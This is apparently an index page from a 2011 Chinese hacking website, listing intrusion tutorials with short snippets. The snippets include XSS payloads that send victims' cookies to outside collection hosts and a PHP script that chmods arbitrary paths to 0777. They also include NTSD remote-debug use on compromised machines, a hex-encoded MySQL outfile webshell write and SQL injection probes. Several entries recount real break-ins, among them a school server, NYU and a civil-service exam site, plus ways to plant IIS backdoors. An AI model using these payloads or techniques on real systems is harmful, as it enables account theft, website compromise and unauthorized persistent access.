| 
| 
 
|  |   
|  | 用IIS6.0的文件解析缺陷留后门 |   
|  | 日期:2011-05-26 13:56:44 
点击:669 评论:0   |   
| By:乱雪 IIS对文件解析可以用ISAPI扩展。上传漏洞中,经典的asa、cer、cdx扩展名上传拿webshell都是因为默认情况下,IIS对其后缀名映射到了asp.dll,asp.dll又是ASP脚本的解析文件。 最近没钱,为了免费上网,拿了学校服务器权限开VPN,为了在服务器里持久留个缺陷方 |  
 
|  |   
|  | Mysql跨库入侵介绍 |   
|  | 日期:2011-05-17 11:24:35 
点击:85 评论:0   |   
| 入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。 那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之.. (当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的, |  
 
|  |   
|  | 入侵纽约大学过程 |   
|  | 日期:2011-05-17 11:23:40 
点击:105 评论:0   |   
| 一 原理分析 我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的 mysql use information_schema; Database changed mysql show tables; +---------------------------------------+ | Tables_in_information_schema | +------- |  
 
|  |   
|  | Firefox攻击技巧总结 |   
|  | 日期:2011-05-17 11:22:31 
点击:89 评论:0   |   
| 在阅读《ClubHACK》黑客杂志时,看到一篇关于Firefox浏览器攻击手法的文章, 标题为《Mozilla Firefox Internals Attack Strategies》,里面提供有多份javascript代码, 用于实现Firefox浏览器下的脚本攻击。本文对此作个简单记录留作备忘, 以后需要用到时方便回头查 |  
 
|  |   
|  | linux不提权跨目录访问的代码 |   
|  | 日期:2011-05-12 10:39:24 
点击:168 评论:0   |   
| inux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。 代码如下: ?php $path = stripslashes($_GET['path']); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permiss |  
 
|  |   
|  | 1433终极入侵之沙盒模式 |   
|  | 日期:2011-05-12 10:38:36 
点击:115 评论:0   |   
| 1433好扫,但是难入侵啊! 不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。 哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办? 或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道 |  
 
|  |   
|  | 微软的“后门”:NTSD.exe,的远程调试功能利用 |   
|  | 日期:2011-05-09 17:04:26 
点击:135 评论:0   |   
| 1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。 2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1. |  
 
|  |   
|  | xss跨站脚本攻击大全 |   
|  | 日期:2011-05-09 16:58:47 
点击:242 评论:0   |   
| (1)普通的XSS JavaScript注入 SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT (2)IMG标签XSS使用JavaScript命令 SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT (3)IMG标签无分号无引号 IMG SRC=javascript:alert(XSS) (4)IMG标签大小写不敏感 IMG SRC=JaVaScRiPt:alert(XS |  
 
|  |   
|  | Xss获取管理员后台地址实战 |   
|  | 日期:2011-05-06 12:00:19 
点击:336 评论:0   |   
| 作者:Trojan [ESST] 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/thread-793-1-1.html 前段时间在开游戏支付平台,开始拿到代码的时候看了一下,没找到注入漏洞,就索性以为很安全.代码如下复制内容到剪贴板代码: !--#include file=inc/conn.asp |  
 
|  |   
|  | XSS(跨站)偷cookie的代码 |   
|  | 日期:2011-05-06 11:59:54 
点击:325 评论:0   |   
| scriptdocument.write('img src=http://url/news.asp?msg='+document.cookie+' width=0 height=0 border=0 /');/script news.asp代码: % msg=Request.ServerVariables(QUERY_STRING) testfile=Server.MapPath(cook.txt) set fs=server.CreateObject(scripting.filesys |  
 
|  |   
|  | XSS偷取密码Cookies通用脚本 |   
|  | 日期:2011-05-06 11:59:05 
点击:2810 评论:0   |   
| 很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取的cookies 截获用户名密码 主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱 内 |  
 
|  |   
|  | XSS漏洞基本攻击代码 |   
|  | 日期:2011-05-06 11:58:42 
点击:2639 评论:5   |   
| javascript scriptalert(document.cookie);/script scriptdocument.location.replace('http://www.20060801.com/xss/getcookie.php?c='+document.cookie);/script document.write('img src=http://www.20060801.com/xss/getcookie.php?c='+document.cookie+' width=0 h |  
 
|  |   
|  | 渗透校内网——XSS过程详解 |   
|  | 日期:2011-05-04 14:56:42 
点击:209 评论:0   |   
| 余弦函数 ( http://hi.baidu.com/ycosxhack )三更半夜原创 我知道校内网曾经爆发的那个蠕虫,那时候爆发这个相对来说容易,因为那时XSS没任何挑战,而AJAX蠕虫不是谁都可以写出来的,至少要有不错的JavaScript编程能力。我是这两天才开始认真使用校内网的,使用前就 |  
 
|  |   
|  | mysql可多语句执行下不用单引号outfile写shell |   
|  | 日期:2011-05-04 14:56:16 
点击:342 评论:0   |   
| mysql use xssdb; Database changed mysql set @a=0x73656C6563742030783343334637303638373032303430363537363631364332 38323435463530344635333534354232373633364436343237354432393342334633452066726F6D 20787373206C696D6974203120696E746F206F757466696C652027 |  
 
|  |   
|  | 高级PHP手工注入 |   
|  | 日期:2011-05-04 14:55:17 
点击:110 评论:0   |   
| 1.判断版本 http://www.xxxx.com/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))51 返回正常,说明大于4.0版本,支持ounion查询 2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解 http://www.xxxx.com/document/advisory/deta |  
 
|  |   
|  | 入侵 www.gongwuyuan.com.cn (中国公务员考试中心) 全过程 |   
|  | 日期:2011-04-20 14:31:50 
点击:201 评论:0   |   
| 入侵这个网站也是一个偶然的机会,我朋友要考公务员想要下载一些资料,但是很多都是会员才能下载到的资料。她找到我让我帮她搞个账号,妹子开口总不能拒绝把。 1.webshell 打开网站,大致看一眼。网站上前台的页面基本上都已经生成了静态页面(估计是dede或者是phpwind |  
 
|  |   
|  | KesionCMS V7.0科汛内容网站管理系统拿webshell |   
|  | 日期:2011-04-18 10:28:35 
点击:2528 评论:0   |   
| KesionCMS V7是漳州科兴信息技术有限公司采用ASP与(Access 2003)SQL Server2000开发的一款万能建站产品,前后已更新过7个大版本及数十个小版本。是目前国内最强的ASP的开源系统。其下内置10几个子产品,包括文章、图片、下载、动漫、问答、商城、供求、音乐、影视、 |  
 
|  |   
|  | 站长内容联盟后台Cookie欺骗漏洞利用 |   
|  | 日期:2011-04-18 10:27:59 
点击:74 评论:0   |   
| 站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。网站内容联盟,想必大多数站长都是知道的,或许都加入过一个或多个联盟。或许有些新人不了解,这里还是简单介绍一下网站内容联盟的特点 |  
 
|  |   
|  | 入侵检测三级跳 解析跳板技术 |   
|  | 日期:2011-04-14 09:39:57 
点击:89 评论:0   |   
| 【IT专家网独家】 网络入侵,安全第一。一个狡猾的、高明的入侵者,不会冒然实行动。他们在入侵时前会做足功课,入侵时会通过各种技术手段保护自己,以防被对方发现,引火烧身。其中,跳板技术是攻击者通常采用的技术。下面笔者结合实例,解析攻击入侵中的跳板技术。 1 |  
 
|  |   
|  | 浅谈跨域WEB攻击 |   
|  | 日期:2011-04-11 14:05:59 
点击:133 评论:0   |   
| 浅谈跨域web攻击 EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-04-07 From: http://www.80sec.com 000 前言 一直想说说跨域web攻击这一概念,先前积累了一些案例和经验,所以想写这么一篇文档让大家了解一下跨域web攻击,跨域web攻击指的是利用网站 |  |  | 
| 
 
| 
 
|  |  | 本月热点文章 |  |  |   
|  |  
 
| 
 
| 
 
|  |  | 本月推荐文章 |  |  |   
|  |  
 
| 
 
| 
 
|  |  | 相关分类 |  |  |   
|  |  |